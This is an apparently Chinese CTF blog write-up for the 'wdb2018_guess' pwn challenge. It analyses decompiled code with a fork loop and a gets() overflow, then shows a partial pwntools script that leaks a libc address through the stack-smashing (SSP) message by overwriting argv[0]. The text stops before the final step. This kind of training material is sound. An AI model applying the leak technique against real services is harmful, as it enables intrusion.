  <!DOCTYPE html>
  <html lang="zh-CN"  
      data-theme-mode="auto"
  >
  <head>
  <meta charset="utf-8">
  
  
  
  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_ex15nbittbh';window.REIMU_CONFIG.clipboard_tips = {"success":{"zh-CN":"复制成功 (*^▽^*)"},"fail":{"zh-CN":"复制失败 (ﾟ⊿ﾟ)ﾂ"},"copyright":{"enable":false,"count":50,"license_type":"by-nc-sa"}};window.REIMU_CONFIG.clipboard_tips.copyright.content = '本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！';window.REIMU_CONFIG.code_block = {"expand":true};window.REIMU_CONFIG.base = 'https://idcm-svg.github.io/HFTTC.github.io';window.REIMU_CONFIG.relative = '/HFTTC.github.io/';</script>
  <title>
    SSPLeak&amp;Fork | SEZUVEM=&#39;s Blog
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic|Noto Serif SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic|Noto Serif SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media='all'">
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_ex15nbittbh.woff2" as="font" type="font/woff2" crossorigin="anonymous">
    
<link rel="stylesheet" href="/HFTTC.github.io/css/loader.css">

    <meta name="description" content="SSP Leak &amp; Fork96）wdb2018_guess(Fork&amp;SSP Leak&amp;environ)  12345678910111213141516171819202122232425262728293031323334353637383940414243__int64 __fastcall main(__int64 a1, char **a2, char **a">
<meta property="og:type" content="article">
<meta property="og:title" content="SSPLeak&amp;Fork">
<meta property="og:url" content="https://idcm-svg.github.io/HFTTC.github.io/2026/04/28/SSPLeak&Fork/index.html">
<meta property="og:site_name" content="SEZUVEM&#x3D;&#39;s Blog">
<meta property="og:description" content="SSP Leak &amp; Fork96）wdb2018_guess(Fork&amp;SSP Leak&amp;environ)  12345678910111213141516171819202122232425262728293031323334353637383940414243__int64 __fastcall main(__int64 a1, char **a2, char **a">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/1774664982507-dd2c441f-5921-4ccf-a809-c18eb0a0ad39-030948.png">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/1774793301694-d659e175-c6d3-40f5-a7a8-5cd8ef286012-442001.png">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/1774792925819-808ca46a-58b8-4404-9605-75a16f942918-063350.png">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/1774780966947-71cd5979-2a72-46bd-868f-ffffba5d9120-146621.png">
<meta property="article:published_time" content="2026-04-28T11:14:15.304Z">
<meta property="article:modified_time" content="2026-04-28T11:19:30.358Z">
<meta property="article:author" content="SEZUVEM&#x3D;">
<meta property="article:tag" content="Pwn, CTF, Binary">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/1774664982507-dd2c441f-5921-4ccf-a809-c18eb0a0ad39-030948.png">
      <meta name="keywords" content="Pwn, CTF, Binary">
    <link rel="alternate" href="/HFTTC.github.io/atom.xml" title="SEZUVEM='s Blog" type="application/atom+xml">
    <link rel="shortcut icon" href="/HFTTC.github.io/images/favicon.ico">
  
<link rel="stylesheet" href="/HFTTC.github.io/css/style.css">

  <link rel="preload" as="style" onload="this.onload=null;this.rel='stylesheet'" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" integrity="sha384-IfxC36XL/toUyJ939C73PcgMuRzAZuIzZxE38drsmO5p6jD7ei+Zx/1oA/0l8ysE" crossorigin="anonymous">
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.2/dist/aos.css" integrity="sha384-GMRP93c6Hkz9JVKGAuRR3nTS7M07RwPgTFenXiosjq2VbVgvdDNcz1g6Mkj8AONa" crossorigin="anonymous">

<meta name="generator" content="Hexo 8.1.1"></head>

  <body>
      <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi rotate">
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  <script>
    var time = null;
    var loaderEl = document.getElementById('loader');
    var startLoading = () => {
      time = Date.now();
      loaderEl.classList.remove("loading");
    }
    var hideLoader = () => {
      document.body.style.overflow = 'auto';
      loader.classList.add('loading');
    };

    var endLoading = () => {
      if (!time) {
        hideLoader();
      } else {
        if (Date.now() - time > 500) {
          time = null;
          hideLoader();
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    loaderEl.addEventListener('click', endLoading);
  </script>
<div id="copy-tooltip"></div>
<div id="heatmap-tooltip"></div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav" aria-label="Primary navigation">
        <a class="main-nav-link-wrap" href="/HFTTC.github.io/">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">首页</span>
        </a>
        <a class="main-nav-link-wrap" href="/HFTTC.github.io/archives">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">归档</span>
        </a>
        <a class="main-nav-link-wrap" href="/HFTTC.github.io/about">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">关于</span>
        </a>
        <a class="main-nav-link-wrap" href="/HFTTC.github.io/friend">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">友链</span>
        </a>
    <a id="main-nav-toggle" class="nav-icon" aria-label="Toggle navigation" role="button"></a>
  </nav>
  <nav id="sub-nav" aria-label="Secondary navigation">
      <a id="nav-rss-link" class="nav-icon" href="/HFTTC.github.io/atom.xml" title="RSS 订阅" aria-label="RSS 订阅" target="_blank"></a>
  </nav>
</div>
<header id="header" aria-label="Site header">
        <picture>
        </picture>
          <img  fetchpriority="high" src="/HFTTC.github.io/images/banner.webp" alt="SSPLeak&amp;Fork">
  <div id="header-outer">
    <div id="header-title">
          <span id="logo">
            <h1 data-aos="slide-up">SSPLeak&amp;Fork</h1>
          </span>
        <h2 id="subtitle-wrap" data-aos="slide-down">
        </h2>
    </div>
  </div>
</header>

        <div id="content" aria-label="Page content"  class="sidebar-right" >
          <aside id="sidebar" aria-label="Sidebar">
  <div class="sidebar-wrapper-container sticky">
  <div class="sidebar-wrapper">
    <div class="sidebar-wrap" data-aos="fade-up">
          <div class="sidebar-toc-sidebar"><h3 class="toc-title">文章目录</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SSP-Leak-Fork"><span class="toc-number">1.</span> <span class="toc-text">SSP Leak &amp; Fork</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#96%EF%BC%89wdb2018-guess-Fork-SSP-Leak-environ"><span class="toc-number">1.1.</span> <span class="toc-text">96）wdb2018_guess(Fork&amp;SSP Leak&amp;environ)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp-%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="toc-number">1.2.</span> <span class="toc-text">exp 思路：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link"><span class="toc-number">1.3.</span> <span class="toc-text"></span></a></li></ol></li></ol>
</div>
</div>
          <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/HFTTC.github.io/avatar/head.jpg" data-sizes="auto" alt="SEZUVEM=" class="lazyload">
  <div class="sidebar-author-name">SEZUVEM=</div>
  <div class="sidebar-description">心之所向，无问西东</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">198</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">0</div>
  </div>
</div>
<div class="sidebar-social" >
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/" aria-label="首页"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/archives" aria-label="归档"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/about" aria-label="关于"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/friend" aria-label="友链"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
</div>
</div>
          <div class="sidebar-btn-wrapper" style="position:static">
            <div class="sidebar-toc-btn current"></div>
            <div class="sidebar-common-btn"></div>
          </div>
    </div>
  </div>
  <div class="sidebar-widget">
  </div>
  </div>
</aside>

          <section id="main" aria-label="Main content"><article id="post-SSPLeak&amp;Fork" class="h-entry article" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <span class="article-date-link icon-calendar" data-aos="zoom-in">
    <time datetime="2026-04-28T11:14:15.304Z" itemprop="datePublished">2026-04-28</time>
    <time style="display: none;" id="post-update-time">2026-04-28</time>
  </span>
</div>

    </div>
    
    <div class="hr-line"></div>
    
    <div class="e-content article-entry" itemprop="articleBody">
        <h1 id="SSP-Leak-Fork"><a href="#SSP-Leak-Fork" class="headerlink" title="SSP Leak &amp; Fork"></a>SSP Leak &amp; Fork</h1><h3 id="96）wdb2018-guess-Fork-SSP-Leak-environ"><a href="#96）wdb2018-guess-Fork-SSP-Leak-environ" class="headerlink" title="96）wdb2018_guess(Fork&amp;SSP Leak&amp;environ)"></a>96）wdb2018_guess(Fork&amp;SSP Leak&amp;environ)</h3><img src="/HFTTC.github.io/images/pwn/1774664982507-dd2c441f-5921-4ccf-a809-c18eb0a0ad39-030948.png" alt="1774664982507-dd2c441f-5921-4ccf-a809-c18eb0a0ad39.png" style="max-width: 100%; display: block; margin: 0 auto;">

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">main</span><span class="params">(__int64 a1, <span class="type">char</span> **a2, <span class="type">char</span> **a3)</span></span><br><span class="line">&#123;</span><br><span class="line">    __WAIT_STATUS stat_loc; <span class="comment">// [rsp+14h] [rbp-8Ch] BYREF</span></span><br><span class="line">    __int64 n3_1; <span class="comment">// [rsp+20h] [rbp-80h]</span></span><br><span class="line">    __int64 n3; <span class="comment">// [rsp+28h] [rbp-78h]</span></span><br><span class="line">    <span class="type">char</span> buf[<span class="number">48</span>]; <span class="comment">// [rsp+30h] [rbp-70h] BYREF</span></span><br><span class="line">    <span class="type">char</span> s2[<span class="number">56</span>]; <span class="comment">// [rsp+60h] [rbp-40h] BYREF</span></span><br><span class="line">    <span class="type">unsigned</span> __int64 v10; <span class="comment">// [rsp+98h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">    v10 = __readfsqword(<span class="number">0x28u</span>);</span><br><span class="line">    n3 = <span class="number">3</span>;</span><br><span class="line">    LODWORD(stat_loc.__uptr) = <span class="number">0</span>;</span><br><span class="line">    n3_1 = <span class="number">0</span>;</span><br><span class="line">    sub_4009A6(a1, a2, a3);</span><br><span class="line">    HIDWORD(stat_loc.__iptr) = open(<span class="string">&quot;./flag.txt&quot;</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> ( HIDWORD(stat_loc.__iptr) == <span class="number">-1</span> )</span><br><span class="line">    &#123;</span><br><span class="line">        perror(<span class="string">&quot;./flag.txt&quot;</span>);</span><br><span class="line">        _exit(<span class="number">-1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    read(SHIDWORD(stat_loc.__iptr), buf, <span class="number">0x30u</span>);</span><br><span class="line">    close(SHIDWORD(stat_loc.__iptr));</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;This is GUESS FLAG CHALLENGE!&quot;</span>);</span><br><span class="line">    <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> ( n3_1 &gt;= n3 )</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="built_in">puts</span>(<span class="string">&quot;you have no sense... bye :-) &quot;</span>);</span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> ( !(<span class="type">unsigned</span> <span class="type">int</span>)sub_400A11() )</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        ++n3_1;</span><br><span class="line">        wait((__WAIT_STATUS)&amp;stat_loc);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Please type your guessing flag&quot;</span>);</span><br><span class="line">    gets(s2);</span><br><span class="line">    <span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(buf, s2) )</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;You must have great six sense!!!! :-o &quot;</span>);</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;You should take more effort to get six sence, and one more challenge!!&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>主要工作是对该 main 函数进行分析：</p>
<p>1. </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">n3 = <span class="number">3</span>;</span><br><span class="line">LODWORD(stat_loc.__uptr) = <span class="number">0</span>;</span><br><span class="line">n3_1 = <span class="number">0</span>;</span><br></pre></td></tr></table></figure>

<ul>
<li>初始化 n3 为 3，表示最多允许 3 次循环。</li>
<li>清零 stat_loc 的低32位。</li>
<li>初始化当前次数计数器 n3_1 为 0。</li>
</ul>
<ol start="2">
<li>读取 flag 文件</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HIDWORD(stat_loc.__iptr) = open(<span class="string">&quot;./flag.txt&quot;</span>, <span class="number">0</span>);</span><br></pre></td></tr></table></figure>

<p>调用 0，也就是以只读打开 flag.txt。把文件描述符 fd 存放在了指针的高 32 位当中</p>
<ol start="3">
<li>检查</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( HIDWORD(stat_loc.__iptr) == <span class="number">-1</span> )</span><br><span class="line">&#123;</span><br><span class="line">    perror(<span class="string">&quot;./flag.txt&quot;</span>);</span><br><span class="line">    _exit(<span class="number">-1</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>检查文件是否打开，失败为-1，打印错误信息并强制退出。</p>
<ol start="4">
<li>读取文件内容</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">read(SHIDWORD(stat_loc.__iptr), buf, <span class="number">0x30u</span>);</span><br><span class="line">close(SHIDWORD(stat_loc.__iptr));</span><br></pre></td></tr></table></figure>

<p> 从刚才打开的文件描述符中读取 0x30（48字节）的数据，存放到 buf 数组中。  S 表示 signed 有符号</p>
<ol start="5">
<li>GUESS</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;This is GUESS FLAG CHALLENGE!&quot;</span>);</span><br><span class="line"><span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">if</span> ( n3_1 &gt;= n3 )</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;you have no sense... bye :-) &quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( !(<span class="type">unsigned</span> <span class="type">int</span>)sub_400A11() )</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    ++n3_1;</span><br><span class="line">    wait((__WAIT_STATUS)&amp;stat_loc);</span><br><span class="line">&#125;</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;Please type your guessing flag&quot;</span>);</span><br><span class="line">gets(s2);</span><br><span class="line"><span class="comment">/* gets 没有任何边界检查，它会一直读取用户的输入直到遇到换行符。</span></span><br><span class="line"><span class="comment">   由于 s2 的大小只有 56 字节，只要用户输入超过 56 字节的数据，</span></span><br><span class="line"><span class="comment">   就会导致栈溢出，可以借此覆盖栈上的 Canary 或返回地址，从而劫持程序控制流。</span></span><br></pre></td></tr></table></figure>

<ul>
<li>n3_1 是已经尝试的次数（初始为 0），n3 是最大允许次数（前面代码初始化为了 3）。</li>
<li>每次循环开始时，父进程都会检查次数。如果已经达到 3 次，父进程就会打印无情的告别语，并直接 return 0 结束整个程序。</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( !(unsigned <span class="built_in">int</span>)sub_400A11() )</span><br><span class="line">     <span class="keyword">break</span>;</span><br><span class="line">     </span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">__int64 sub_400A11()</span></span><br><span class="line"><span class="string">&#123;</span></span><br><span class="line"><span class="string">  unsigned int v1; // [rsp+Ch] [rbp-4h]</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">  v1 = fork();</span></span><br><span class="line"><span class="string">  if ( v1 == -1 )</span></span><br><span class="line"><span class="string">    err(1, &quot;can not fork&quot;);</span></span><br><span class="line"><span class="string">  return v1;</span></span><br><span class="line"><span class="string">&#125;    </span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br></pre></td></tr></table></figure>

<ul>
<li>sub_400A11() 就是 fork()。程序运行到这里，会分裂成两个平行的进程。</li>
<li>对于子进程（分身）**：**fork() 返回 0。!0 为真（1），执行 break。<strong>子进程成功跳出了这个 while(1) 循环</strong>，继续往下执行去调用危险的 gets(s2)，准备接收你的输入。</li>
<li>对于父进程（本体）：fork() 返回子进程的 PID（一个大于 0 的数字）。!PID 为假（0），不会执行 break。父进程依然留在这个 while(1) 循环里。</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">++n3_1;</span><br><span class="line">wait((__WAIT_STATUS)&amp;stat_loc);</span><br></pre></td></tr></table></figure>

<ul>
<li>由于子进程已经 break 出去了，只有父进程会执行这两行。</li>
<li>++n3_1：父进程将已经消耗的机会次数加 1。</li>
<li>wait(…)：父进程在这里挂起（也就是睡着了），耐心等待刚刚派出去的子进程执行完毕。</li>
<li>如果子进程中发生了栈溢出崩溃（比如触发了 Canary 保护机制被操作系统干掉）。</li>
<li>或者子进程正常比对了 Flag 并退出（return 0）。</li>
<li>只要子进程一死，父进程的 wait 就会立刻苏醒，然后重新回到 while(1) 的开头，开启下一轮的循环（检查次数 -&gt; 召唤新分身 -&gt; 继续等待）。</li>
</ul>
<ol start="6">
<li>tip</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">如果你直接在一个普通的程序里触发栈溢出并覆盖了 Stack Canary（栈保护金丝雀）</span><br><span class="line">程序会立刻 abort（崩溃退出），你就没有任何机会继续利用漏洞了。</span><br><span class="line"></span><br><span class="line">但是有了这个 <span class="keyword">while</span>(<span class="number">1</span>) + fork() 的机制，就产生了一个致命的弱点：</span><br><span class="line">在 Linux 中，fork() 出的子进程会完美继承父进程的内存状态。</span><br><span class="line">这意味着，这 <span class="number">3</span> 次派出的子进程，它们内存里的 Stack Canary 的值是完全一模一样的！</span><br><span class="line"></span><br><span class="line">这就给了攻击者一种名为 “逐字节爆破” 的手法。</span><br><span class="line">每次溢出一个字节，如果程序崩溃了（通过 wait 状态感知），说明猜错了；</span><br><span class="line">如果程序没崩溃，说明猜对了，就可以继续猜下一个字节。</span><br><span class="line">虽然这道题只给了 <span class="number">3</span> 次机会,但是可以不断地去爆破</span><br></pre></td></tr></table></figure>

<ol start="7">
<li>strcmp 进行比较</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(buf, s2) )</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;You must have great six sense!!!! :-o &quot;</span>);</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;You should take more effort to get six sence, and one more challenge!!&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>总结一下整个程序 fork 的流程：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span> 主程序（父进程）启动，读取真实的 flag.txt 保存到自己的内存里。</span><br><span class="line"></span><br><span class="line"><span class="number">2.</span> 循环阶段（最多 <span class="number">3</span> 次）：</span><br><span class="line">进入 <span class="keyword">while</span> 循环后，父子进程开始分工：</span><br><span class="line"></span><br><span class="line">    第一步：克隆分身 (fork)</span><br><span class="line">    父进程克隆出一个一模一样的子进程。</span><br><span class="line">    此时，子进程也拥有了和父进程一模一样的内存（包括那个真实的 Flag 和栈溢出漏洞）。</span><br><span class="line"></span><br><span class="line">    第二步：子进程去“踩雷”</span><br><span class="line">    子进程判断自己是分身（返回值是 <span class="number">0</span>），于是跳出循环往下走。</span><br><span class="line">    它调用危险的 gets() 接收你的输入，比对 Flag，最后退出（死亡）。</span><br><span class="line">    如果你的输入太长导致程序崩溃，死掉的也只是这个子进程。</span><br><span class="line"></span><br><span class="line">    第三步：父进程“看戏”</span><br><span class="line">    父进程判断自己是本体（返回值是非 <span class="number">0</span>），它留在循环里。</span><br><span class="line">    把消耗次数 +<span class="number">1</span>，然后调用 wait() ，直到子进程死掉它才醒来。</span><br><span class="line"></span><br><span class="line">    第四步：</span><br><span class="line">    子进程一死，父进程醒来，重新回到循环开头。</span><br><span class="line">    只要没超过 <span class="number">3</span> 次，它就会再克隆一个全新的子进程给你。</span><br></pre></td></tr></table></figure>

<img src="/HFTTC.github.io/images/pwn/1774793301694-d659e175-c6d3-40f5-a7a8-5cd8ef286012-442001.png" alt="1774793301694-d659e175-c6d3-40f5-a7a8-5cd8ef286012.png" style="max-width: 100%; display: block; margin: 0 auto;">

<h3 id="exp-思路："><a href="#exp-思路：" class="headerlink" title="exp 思路："></a>exp 思路：</h3><p>把断点下在 gets 处，rdi 即为我们要输入的地址。我们还需要寻找 angr[0] 的位置在 0x…d38 的位置</p>
<img src="/HFTTC.github.io/images/pwn/1774792925819-808ca46a-58b8-4404-9605-75a16f942918-063350.png" alt="1774792925819-808ca46a-58b8-4404-9605-75a16f942918.png" style="max-width: 100%; display: block; margin: 0 auto;">

<p>0xd38 - 0xc10 &#x3D; 0x128</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment"># from LibcSearcher import LibcSearcher</span></span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line"></span><br><span class="line">binary = <span class="string">&#x27;./GUESS&#x27;</span></span><br><span class="line">r = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">27431</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;x64libc-2.23.so&#x27;</span>)</span><br><span class="line"><span class="comment">#r = process(binary)</span></span><br><span class="line">elf = ELF(binary)</span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">&quot;Please type your guessing flag&quot;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x128</span>+p64(puts_got)</span><br><span class="line"><span class="comment">#gdb.attach(r)</span></span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.recvuntil(<span class="string">&quot;stack smashing detected ***: &quot;</span>)</span><br><span class="line">puts_addr = u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br></pre></td></tr></table></figure>

<p>之后通过 libc 去寻找真实地址：</p>
